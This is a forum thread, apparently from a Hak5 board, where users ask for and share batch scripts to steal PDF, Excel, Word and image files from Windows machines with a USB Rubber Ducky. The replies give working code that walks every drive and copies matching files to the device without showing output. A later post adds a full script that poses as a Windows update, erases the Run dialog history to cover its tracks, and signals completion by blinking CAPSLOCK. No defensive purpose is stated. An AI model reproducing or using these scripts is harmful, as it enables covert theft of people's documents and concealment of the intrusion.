NotANinja Posted December 17, 2016 Posted December 17, 2016 In Hak5's blog post about stealing files with the USB Rubber Ducky, they only targeted the documents folder on the C: drive. I'm looking to steal all .PDFs/Excel spreadsheet, regardless of their directory/drive. Can anyone show me how this is done? I have been trying all day now, but can't get a satisfactory result. Thanks in advance! Any help would be greatly appreciated. Quote
NotANinja Posted December 18, 2016 Author Posted December 18, 2016 Are you sure you didn't reply to the wrong thread, kdodge? Quote
Cribbit Posted December 19, 2016 Posted December 19, 2016 There are probably a few ways to do this. Code below is untested on a ducky REM Get all drive letters, skips name lable FOR /F "skip=1" %%A IN ('wmic logicaldisk get name') DO ( REM Check drive is not the ducky IF %%~dA NEQ %~d0 ( REM COPY FILE xcopy /C /Q /G /Y /S %%A\*.pdf %dst% >>nul ) ) or REM Get all drive letters, skips name lable FOR /F "skip=1" %%A IN ('wmic logicaldisk get name') DO ( REM Check drive is not the ducky IF %%~dA NEQ %~d0 ( REM Call dir on each drive letter find files ending in .pdf or .xlsx FOR /F "delims==" %%I IN ('dir %%A\ /s /b /a-d ^| findstr /ile ".pdf .xlsx"') DO ( REM COPY FILE xcopy /C /Q /G /Y %%I %dst% >>nul ) ) ) Hope this helps Quote
voidnecron_ Posted December 19, 2016 Posted December 19, 2016 Cribbit has a good point, but this will take forever though. If you have limited time to extract you could consider using %homepath% to see where Windows stores files by default. In most company GPO's this will be directed to some network drive. %temp% could have interesting stuff as well. Cheers. Quote
felipe Posted December 23, 2016 Posted December 23, 2016 Need help here.. It will steal all pdf, doc, docx, jpeg, jpg from %USERPROFILE ? e.cmd @echo off @echo Installing Windows Update REM Delete registry keys storing Run dialog history REG DELETE HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\RunMRU /f REM Creates directory compromised of computer name, date and time REM %~d0 = path to this batch file. %COMPUTERNAME%, %date% and %time% pretty obvious set dst=%~d0\slurp\%COMPUTERNAME%_%date:~-4,4%%date:~-10,2%%date:~7,2%_%time:~-11,2%%time:~-8,2%%time:~-5,2% mkdir %dst% >>nul if Exist %USERPROFILE%\Documents ( REM /C Continues copying even if errors occur. REM /Q Does not display file names while copying. REM /G Allows the copying of encrypted files to destination that does not support encryption. REM /Y Suppresses prompting to confirm you want to overwrite an existing destination file. REM /E Copies directories and subdirectories, including empty ones. REM xcopy /C /Q /G /Y /E %USERPROFILE%\Documents\*.pdf %dst% >>nul REM Same as above but does not create empty directories xcopy /C /Q /G /Y /S %USERPROFILE%\Documents\*.pdf %dst% >>nul xcopy /C /Q /G /Y /S %USERPROFILE%\Documents\*.doc %dst% >>nul xcopy /C /Q /G /Y /S %USERPROFILE%\Documents\*.docx %dst% >>nul xcopy /C /Q /G /Y /S %USERPROFILE%\Documents\*.jpg %dst% >>nul xcopy /C /Q /G /Y /S %USERPROFILE%\Documents\*.jpeg %dst% >>nul ) REM Blink CAPSLOCK key start /b /wait powershell.exe -nologo -WindowStyle Hidden -sta -command "$wsh = New-Object -ComObject WScript.Shell;$wsh.SendKeys('{CAPSLOCK}');sleep -m 250;$wsh.SendKeys('{CAPSLOCK}');sleep -m 250;$wsh.SendKeys('{CAPSLOCK}');sleep -m 250;$wsh.SendKeys('{CAPSLOCK}')" @cls @exit Quote
Recommended Posts
Join the conversation
You can post now and register later. If you have an account, sign in now to post with your account.